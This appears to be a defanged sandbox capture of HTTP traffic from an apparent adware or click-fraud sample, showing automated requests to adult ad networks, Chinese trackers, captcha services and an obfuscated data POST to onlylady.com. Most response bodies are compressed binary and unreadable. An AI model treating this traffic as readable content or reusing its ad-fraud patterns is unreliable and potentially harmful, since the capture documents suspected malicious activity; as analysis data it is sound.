d=69f0cb67a95750bb9d659063a11845e26375eabfeea248e876bd97194aa97646cb5eb88e96085197c20f49d5d3ecbd6b0ea961269db787c9ff424e62f52826cb8825b2539523522ac06d0ffe42273b9ce71c7f2b429148dd494088897cac5bbf91086488749eed420af4743022a912b89ce29da3e2f851b20a218b78d1bad22145ebca9172fba0820eb53fb15638c329dce52bd4e2d553200af284c0798536f38ef1116a43e85fd0df4be64a1e47be19f17decb43d39a18a5282b5702deadc8ab46eb96acde132ec0f25127b813011a58326ee762bc2f53a11e2ff335edb76885187a40698eacd669688611a39ba687fbf706a8056681053da4108f961afdfe7f51384f58031cd8d3bb2ec74f6d318aac1f33ce60e4800de76
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

17............340...Pw#......0..HTTP/1.1 200 OK..Server: nginx..Date: 
Fri, 20 Jan 2017 09:55:06 GMT..Content-Type: text/html;charset=UTF-8..
Transfer-Encoding: chunked..Connection: keep-alive..Content-Encoding: 
gzip..17............340...Pw#......0..

GET /ads?spot_id=2007013&rand=1853651284&impid=56_1484906105906078_12799&uuid=48a9dec2-af58-42f3-8797-50cf1a156d48 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2f0.............T]..6.. n*.V*$v.H [....m...}.Ll...v..,..w..../........
....;.;w3..n.....){...Q.....5...W..q..a......&y..hw>Y}Ql.i.m..O.g..
jOB......P..%[`a..u..c...../Z9*.......;7.U(..km....w..ql..Yz<......
....6....V....(H.n.................6._...la.f..x)M..-...........u..XH.
|.........E...E./......(Y..22...$.H......(.(........%%.....v...1...`E.
.f.$..z..U..7.......K\.....p.|$ ..s:..=iI..<.^.s.4..$......^{}.A...
@..,......>....k.9o_>=.@,h.fx..E..&.Uy..kVK1.(]^.8.dUR.$.gRnZL..
ZRshV....C.1.........*..k.&.y....S.jD..4z.NhU#.%u..oQw..oS..r.n.~..(..
F.`..{..../.=.Z^.p8m...C.....~]A..w.<........k".R#4p.]uLA7.ch.C.. .
l......!.vR2...).M....StO...........EL.F.[...p.V...3..C81...].q.^ .0DR
k.R...........G.m)......E.O.yB....n".*...D..?...J...A..hA..O4?.....s..
.......0..

GET /ex?i=mm_26632162_2469125_22608113 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: p.tanx.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:13 GMT

Content-Type: application/x-javascript; charset=gbk

Transfer-Encoding: chunked

Connection: close

Server: Tengine

Vary: Accept-Encoding

Expires: Fri, 20 Jan 2017 09:55:12 GMT

Cache-Control: no-cache

Content-Encoding: gzip

Timing-Allow-Origin: *
1c6............].Mo.1.@...t..b.~......6R UpH.V.....u..W.7....6.@{..<
;..G...S.....*.......b.M....Q...uv3..f..,.'wi:..Q)7....D..F.!.!T!.....
..Q.F.n . ...$...i..@D......Hn&.)j.%....J......I.."7S....*. U....i.@..
d.......bw.4S.g......;.k[.b...".`E^.P....B;..0..~.....W..87.uF...b.c..
...:.....&mg.p..K...Q.. 7../.y.!...i".G?..,..%a.S....XfD..Guq-...3..i.
.......*....X...\5..O.. V|L|j. ..&B........F5....K-d.O\Z~(....Q.......
^PA....p..m..K.}..N...*..r.uaX.......b......0..

GET /g/mm/tanx-cdn2/t/tanxssp.js?_v=12 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: atanx2.alicdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 24246

Connection: keep-alive

Date: Fri, 20 Jan 2017 09:31:57 GMT

x-oss-request-id: 5881D90DDC5D206D778CF4A4

x-oss-bucket-storage-type: standard

Accept-Ranges: bytes

ETag: "C57C18F4BB60403E7ED24AC2C4BDF8F7"

Last-Modified: Thu, 19 Jan 2017 06:21:49 GMT

x-oss-object-type: Normal

x-oss-hash-crc64ecma: 13257893365463920520

Cache-Control: max-age=3600,s-maxage=3600

Vary: Accept-Encoding

x-oss-server-time: 0

Via: cache34.l2de1[0,304-0,H], cache59.l2de1[0,0], cache2.de1[0,200-0,H], cache11.de1[1,0]

Content-Encoding: gzip

Age: 1394

X-Cache: HIT TCP_MEM_HIT dirn:1:924659693

X-Swift-SaveTime: Fri, 20 Jan 2017 09:32:02 GMT

X-Swift-CacheTime: 3595

Timing-Allow-Origin: *

EagleId: c31b1fd314849061110085246e
.............{.F.(.W($#.&H..b....5q&.gbg......$H...j...._U....J.d.y.;.
M."....k.......e?oYv.>k.G..m<.....*....?....e>.nt.....z.._.o/
..0.,....U{....1>..{....l.-.IE4..r2..2Y..v.7..].{.Q./R...g..=h$.w.V
.....;..f.~;.....e.......o..ev.D...xo[3?.k.S.B...@/.5...9.hcl.`?......
....#...n.'C}/z|..2^]-...,....e....../C.@k.l0,.F.^..F.E.p......k,..8..
...w......j..~..}k...p./.x.iW.a.T3...'........<.....0[.z...d..^..42
6....I.QvcF.X,.o_....9...q....j..pER.>....y^..>N...*.......i..t:
.?.z....m.i.F.v..:..l..9.....,J......f=..Y.$i.au..mOrm..d.\..q1o.V..r.
 ..j;:.s...<...r.......Y..^\.c...h1.r...&.il....J.l.$..&,..........
.U.l_.........o..u.....h..%.v~.........z..P....p...x>Z..."t.f...}/.
..SK..x.C..c.... ..}X...f}Wi.. .>]]......S.p..t.0A..i.%t..||.8|.lLh
..............=.....s.........&v.,..c.h.f5...^.~C;g....e..aQ..L....W..
.<,A...U.E3....8\....[..U.a.L.#s...!2c....z./.;.......q(..92.8....^
...0....../...Vv......5.@..w/......B.4.e..`.q...,...;2...7...?........
.L..g^..{Gf.u>..<.{....[.....u.ZU@....q.......%.,.9.Q..%....F%0w
u.7n.!.......i.....0..u.f0a.B..z;..T_......)..o.Q.....c...y.d-..0.l...
...2[...w....:^.P.C.|m^&.d.(#..%D..H. .E..... Z........=..............
.h.....r..?P....@1:.H|.p.......:...........t.x......h.e...jLh.L.......
..t&.u.l...D...?@......Y..r...9.\....*...m..I..._.....f..0`X.....j.4/.
.....d.gW ..L6.N...3.B.. %.......l..W.$.)H..r!..e....# .i6....l..._..*
Y]a5Z.....P..^....r.......4j........=.......n...... ..`7}.J.n.m..xk ..
...h9RB..|..#.Tv......9......}.....7=...K..B}.O..Z-..5..T.[x......<<< skipped >>>

GET /push.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: push.zhanzhang.baidu.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Set-Cookie: BAIDUID=2A347F9844B640AF2D790B56B2008F04:FG=1; max-age=31536000; expires=Sat, 20-Jan-18 09:55:12 GMT; domain=.baidu.com; path=/; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

Content-Type: text/javascript

ETag: "4078520090"

Accept-Ranges: bytes

Last-Modified: Wed, 25 Nov 2015 07:46:13 GMT

Expires: Sat, 20 Jan 2018 09:55:12 GMT

Cache-Control: max-age=31536000

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 227

Date: Fri, 20 Jan 2017 09:55:12 GMT

Server: apache
..........e..j.0.D.%..H.^...aBO..ri..*.mA,...C..{...zY..y.............
.`.>..{=.z.B...>...S...5\....5.....:W...o...`.J...-.j.......DH..
l..0&F|sz..aF..7..{E...k3.j..........._O/a.._...........L......B...<
;...`:.."Y....=....Q.w....HTTP/1.1 200 OK..Set-Cookie: BAIDUID=2A347F9
844B640AF2D790B56B2008F04:FG=1; max-age=31536000; expires=Sat, 20-Jan-
18 09:55:12 GMT; domain=.baidu.com; path=/; version=1..P3P: CP=" OTI D
SP COR IVA OUR IND COM "..Content-Type: text/javascript..ETag: "407852
0090"..Accept-Ranges: bytes..Last-Modified: Wed, 25 Nov 2015 07:46:13 
GMT..Expires: Sat, 20 Jan 2018 09:55:12 GMT..Cache-Control: max-age=31
536000..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Length:
 227..Date: Fri, 20 Jan 2017 09:55:12 GMT..Server: apache............e
..j.0.D.%..H.^...aBO..ri..*.mA,...C..{...zY..y..............`.>..{=
.z.B...>...S...5\....5.....:W...o...`.J...-.j.......DH..l..0&F|sz..
aF..7..{E...k3.j..........._O/a.._...........L......B...<...`:.."Y.
...=....Q.w......

GET /jzt/temp/js/_J.1.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static-alias-1.360buyimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Encoding: gzip

Accept-Ranges: bytes

access-control-allow-origin: *

Cache-Control: max-age=3600

Content-Type: application/javascript

Date: Fri, 20 Jan 2017 09:55:11 GMT

Expires: Fri, 20 Jan 2017 10:03:28 GMT

Last-Modified: Mon, 12 Sep 2016 13:28:19 GMT

Proxy-Connection: keep-alive

Server: ECS (arn/45A1)

Vary: Accept-Encoding

Via: http/1.1 HK-1-JCS-67 ( [cRs f ])

X-Cache: HIT

Content-Length: 3466
...........Z.r...~...*.I..s..hZ.u.n2.f.Ig....M......./c....}..h.@m....
........%.8...|...R...b/.......sY..{..R.N.u.,....T....Y....W,U.3.N....
.8..c6./\L...zO,.....q...=m/.)K..<.>...X.v....\.t..K..=l..J...ec
p.......*..$..0M..{5l...4K.....t;...b........L..o..4.....'..[.a...r.=.
..s.....c.fLL.,....(9.cp[o......^H..Y.b{\.*.)Y@O6..V11!Y....._.....'.]
..s5.....3..o..P..e43^=..k/..L/.D.$....p.G.r.x...9...:P..kVU.GF....S/.
.|.T....0.......k..(o.;.KhA...W...s.].L..t.mkXz...9.`.N?..Y..L....^.\.
[G.kJ..{Q.}.1....T..K'c....i...eq..p...Y.Tn".z.B.3c..^.[s.[.^ .\H.L..#
...DL......E..C..PS~$J(x.RR`.I.5..'.n.2>....g..{<:.9.e..x..'....
\....=..a...S2m.T...r.n.y.....f....s.....=......mD....`7{.o.K.r.x..u..
b|....O.Qw........)y.I(..A..j.2....zHD.].Z9....qREvP.....Dv.....W.=.g~
....R..{....?.#.|P........<B."GW.... ..... .L.$..e..N.f.0lI.?'2..A.
...H..v....We&M.-.,.t.q...N.<.=.i?FB..}....:(..aITK....D..Z.KK"6%.-
Id y.r...[....:.zp..6.}'..b...y...q..I.^.27..^`....*.B....FK-.-.......
...7.V.(..K........M".&Y.^!..>T...A;.....eo.C.2.....4..dK&..C:.:}o.
).....v[....x..p.........6y.1j.9a-6.....$r.O.c.l.......i..Se...P.Bfu.m
..$}..4Y{4.-..Y..y...e.....F, ..6.....rZ."....i..z....Rx.kx.g...;...7w
@.h@RN......DU.....(........7kCx.$.E/2[...c_.EIn...<..6.Z;....6e..^
..(O...>....T..4]*.E.o.|...Q.... A......."......<.{.l..}...."..]
.O/...i.(..R.R.......4d:.,.b..h.x....Ap.....A..J/Z.z........Y..r7.B..&
lt;..Az..As......h.0d.k@H...v`Vx@......vQ].s)Xa..X........P.1..4A:F.cj
<.6@KrR>.j..........pN./.ih.&._.A9V..........nW...c...?a...X<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=54_1484906106090851_7210&uuid=32fa73d3-9003-473d-a39a-6a2fa13bac12 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1343911&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2f1.............Tm..6.. nN..TH..@..jU...............c`._....>.K.C..
..gf......[w3.u......){...Q.v..........q.was.....&y..i{:Z}Vl.j.m.>$
..A=.G..d..eL.c....0qA...PG....U G..6BZ.R..:....u..W?>t..*..[:K....
....T......P..V....i.5...!$/K<...icn......V..,...&......Y.4#..{.^..
.lu..I....2.u...7K?Q6Kw B..7G8Jf.... ).I...$%....0.&......f...@...v...
1..=`E..f.$..z..U... ..#.....*..6....#.....1D.IW...s.u..L..^B.a-|.....
..(....M............4.....g..........1Yg.*/.{.b.z.....g..L...I..s.@$..
.}.X<.....A..~.D..~W.\W.4I...u\.;W!.....pB..Y.....A....K...q.A...A.
k.:..W.........Z..p8m...C....../.e..w..................h..f.......UL..
.S...A..(d|6RS..>..Q.....o...5.j.q........%.B-.R.'P .pb.v..p..=C.`.
.....@....90,_....R..9[.&...L.....J]G T4...@.....J...A..hA...4?.......
........0..

GET /get.php?callback=gtcallback&_=1484906116454 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 2778

Connection: keep-alive

Etag: "31b67ea84f8d1f83124ad7a043f831f08280500f"

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

Set-Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57; expires=Sun, 19 Feb 2017 09:55:18 GMT; Path=/
.(function () {.    var head = document.getElementsByTagName('head')[0
];.    var loadJS = function (url, callback) {.        var s = documen
t.createElement('script');.        var loaded = false;.        var onl
oad = function () {.            if (!loaded &&.                (!s.rea
dyState.                    || "loaded" === s.readyState.             
       || "complete" === s.readyState)) {.                loaded = tru
e;..                // setTimeout for IE10-.                setTimeout
(function () {.                    callback(false);.                },
 0);.            }.        };.        var onerror = function () {.    
        callback(true);.        };.        s.charset = 'UTF-8';.      
  s.id = 'gt_lib';.        s.async = false;.        s.onload = s.onrea
dystatechange = onload;.        s.onerror = onerror;.        s.src = u
rl;.        head.appendChild(s);.    };.    var normalizeDomain = func
tion (domain) {.        // return domain.replace(/^https?:\/\/|\/.*$/g
, '');.        return domain.replace(/^https?:\/\/|\/$/g, '');.    };.
    var normalizePath = function (path) {.        path = path.replace(
/\/ /g, '/');.        if (path.indexOf('/') !== 0) {.            path 
= '/'   path;.        }.        return path;.    };.    var makeURL = 
function (protocol, domain, path) {.        domain = normalizeDomain(d
omain);.        var url = normalizePath(path);.        if (domain) {. 
           url = protocol   domain   url;.        }.        return url
;.    };..    var load = function (protocol, domains, path, callba<<< skipped >>>

GET /refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75dal5&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906122184 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:21 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 353

Connection: keep-alive

Cache-Control: no-cache, no-store, must-revalidate

Etag: "88981b7de849ee851b73f0ff8abb3f049afa09db"

Expires: 0

Pragma: no-cache

geetest_1484906122184({"feedback": "hXXp://VVV.geetest.com/contact#rep
ort", "fullbg": "pictures/gt/7ed8940e0/7ed8940e0.jpg", "type": "slide"
, "height": 116, "bg": "pictures/gt/7ed8940e0/bg/38fb80c9.jpg", "id": 
"", "challenge": "7185e65f5aea0024bf35c5c1275d75da97", "slice": "pictu
res/gt/7ed8940e0/slice/38fb80c9.png", "link": "", "xpos": 0, "ypos": 1
8})HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:21 GMT
..Content-Type: text/javascript;charset=UTF-8..Content-Length: 353..Co
nnection: keep-alive..Cache-Control: no-cache, no-store, must-revalida
te..Etag: "88981b7de849ee851b73f0ff8abb3f049afa09db"..Expires: 0..Prag
ma: no-cache..geetest_1484906122184({"feedback": "hXXp://VVV.geetest.c
om/contact#report", "fullbg": "pictures/gt/7ed8940e0/7ed8940e0.jpg", "
type": "slide", "height": 116, "bg": "pictures/gt/7ed8940e0/bg/38fb80c
9.jpg", "id": "", "challenge": "7185e65f5aea0024bf35c5c1275d75da97", "
slice": "pictures/gt/7ed8940e0/slice/38fb80c9.png", "link": "", "xpos"
: 0, "ypos": 18})....

GET /refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75da5s&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906123339 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:21 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 353

Connection: keep-alive

Cache-Control: no-cache, no-store, must-revalidate

Expires: 0

Pragma: no-cache

Etag: "9138ea4e402ec84a2d4b628e9286c3b88c838060"

geetest_1484906123339({"ypos": 55, "type": "slide", "feedback": "http:
//VVV.geetest.com/contact#report", "link": "", "slice": "pictures/gt/d
0ecb1510/slice/9801f0a3.png", "fullbg": "pictures/gt/d0ecb1510/d0ecb15
10.jpg", "challenge": "7185e65f5aea0024bf35c5c1275d75da4t", "id": "", 
"height": 116, "xpos": 0, "bg": "pictures/gt/d0ecb1510/bg/9801f0a3.jpg
"})HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:21 GMT
..Content-Type: text/javascript;charset=UTF-8..Content-Length: 353..Co
nnection: keep-alive..Cache-Control: no-cache, no-store, must-revalida
te..Expires: 0..Pragma: no-cache..Etag: "9138ea4e402ec84a2d4b628e9286c
3b88c838060"..geetest_1484906123339({"ypos": 55, "type": "slide", "fee
dback": "hXXp://VVV.geetest.com/contact#report", "link": "", "slice": 
"pictures/gt/d0ecb1510/slice/9801f0a3.png", "fullbg": "pictures/gt/d0e
cb1510/d0ecb1510.jpg", "challenge": "7185e65f5aea0024bf35c5c1275d75da4
t", "id": "", "height": 116, "xpos": 0, "bg": "pictures/gt/d0ecb1510/b
g/9801f0a3.jpg"})..

GET /ads?zone_id=1344051&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive

Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1344051" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1344051_1484906106" name="1344051_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=50_1484906106729452_21376&uuid=b3da0bc7-5356-4cf4-8cd7-94102
5e2cf15" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1344051" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAAAzghQAM4IUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

POST /files/onlyladyomd_new2.php HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://gba.onlylady.com/ads6.php

Accept-Language: en-US

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2

Host: VVV.onlylady.com

Content-Length: 7183

Connection: Keep-Alive

Cache-Control: no-cache

data=LGb2BagmBwp6VaWyMzIlMKVvB3Z6AQp6Vzu0qUN6Yl9yoaDho25frJkuMUxhL29gYmVjZGHiZGVjBF8mAmp0AwD0YaAbqT1fVwgmBwRjBvWmqUIzMy90rKOyVwgcBwL7pmbkAQbvnKAsqTSlM2I0K3AyoTLvB3Z6ZGbvZFV7pmbkAmbvnKAsMT91LzkyK3WyMzIlMKVvB3Z6ZGbvZFV7pmblAGbvnKAsqKAyK2SxMTy0nJ9hLJksL29hqTIhqPV7pmbkBvVkVwgmBwD6VzEuqTRvB2R6AQc7pmbkZQbvpTSaMI90nKEfMFV7pmbmZmbv1pJj2Anyjel92fF/mXiTgZC8VZT91eiX1faClXiXk8aYVwgmBwR4BvWuMTEcqTyiozSfK2AioaEyoaDvB3Z6AQpjAGbvVPNtVNx8VF0gVTggo2kaM2ptYF0+QDb8p2AlnKO0Ct0XqzSlVS9boKDtCFOsnT10VUk8VSgqBj0XXTM1ozA0nJ9hXPxtrj0XVPO2LKVtnT0tCFOxo2A1oJIhqP5wpzIuqTISoTIgMJ50XPWmL3WcpUDvXGfAPvNtnT0hp3WwVQ0tVv8inT0hLzScMUHhL29gY2ugYzcmCmH1MQD2ZTWwZ2D4MwxjAGR2AzV3AwuvZGpmMTR1AwVmVwfAPvNtqzSlVUZtCFOxo2A1oJIhqP5aMKESoTIgMJ50p0W5ITSaGzSgMFtvp2AlnKO0VvyoZS07VN0XVPOmYaOupzIhqR5iMTHhnJ5mMKW0DzIzo3WyXTugYPOmXGfAPa0cXPx7QDb8Y3AwpzyjqQ4APt0XCPRgYFP547wzmehwhwZ2AGd7cYs0kAeFflPk6fmvLzShozIlXR9ZDIxcVP0gCt0XCUAwpzyjqQ4APvuzqJ5wqTyiovtcVUfAPvNtVPO2LKVtplN9VPWsVvNeVR1uqTthpzShMT9gXPxhqT9GqUWcozpbZmLcYaAfnJAyXQVcBj0XVPNtVTEiL3I
HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:07 GMT

Server: PWS/8.2.0.5

Transfer-Encoding: chunked

Content-Encoding: gzip

Vary: Accept-Encoding

Px-Uncompress-Origin: -1

X-Px: nc h0-s1124.v0-mow ( origin>CONN)

Cache-Control: max-age=3600

Content-Type: text/html

fpmbackend: 10.15.204.49:9000

ngxserver: 10.15.204.33:80

X-Powered-By: PHP/5.3.29

Connection: keep-alive

a..............HTTP/1.1 200 OK..Date: Fri, 20 Jan 2017 09:55:07 GMT..S
erver: PWS/8.2.0.5..Transfer-Encoding: chunked..Content-Encoding: gzip
..Vary: Accept-Encoding..Px-Uncompress-Origin: -1..X-Px: nc h0-s1124.v
0-mow ( origin>CONN)..Cache-Control: max-age=3600..Content-Type: te
xt/html..fpmbackend: 10.15.204.49:9000..ngxserver: 10.15.204.33:80..X-
Powered-By: PHP/5.3.29..Connection: keep-alive..a................

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_helkJjAewu65OsBLgXRnmTvc3AVFJ-nBZMBU9KtqCZLcy-AbNWPYbf7GmNI2lEK32K0VG9tOWibFGYRxkdwLZs5Z_dpN_c2yorTnWLFwdrSIdgMAMNTUw9-xMvBUaHYCIPzc6pDoco1r_7AkBO7zWbf-wMIKHXW9-KGCLr2eNRdOXZFm96vsDuT6fi5nGdSRbTIXyUNUHw5PAioQCMVkoQplfyQWGcuT8fsDo6aV3YKw5o9EnGZ8z8EJoHWXYsHF8mFFwAQx4F1XtsLGWJS-OiGzF9KGKQmrCd_NuB4fMXjbIsdGYDd50APKO2_iqR3Qp5xUWJB2hTbvkbU7C0R1d1TNpcFply462Nm5gG0IbFXACnMqE3nLLbIwETMolAEJR8&v=404&seq=7 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:13 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:12 GMT

Cache-Control: no-cache

0..

GET /ads?spot_id=2007013&rand=1853651284&impid=28_1484906106403577_17845&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1331611&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

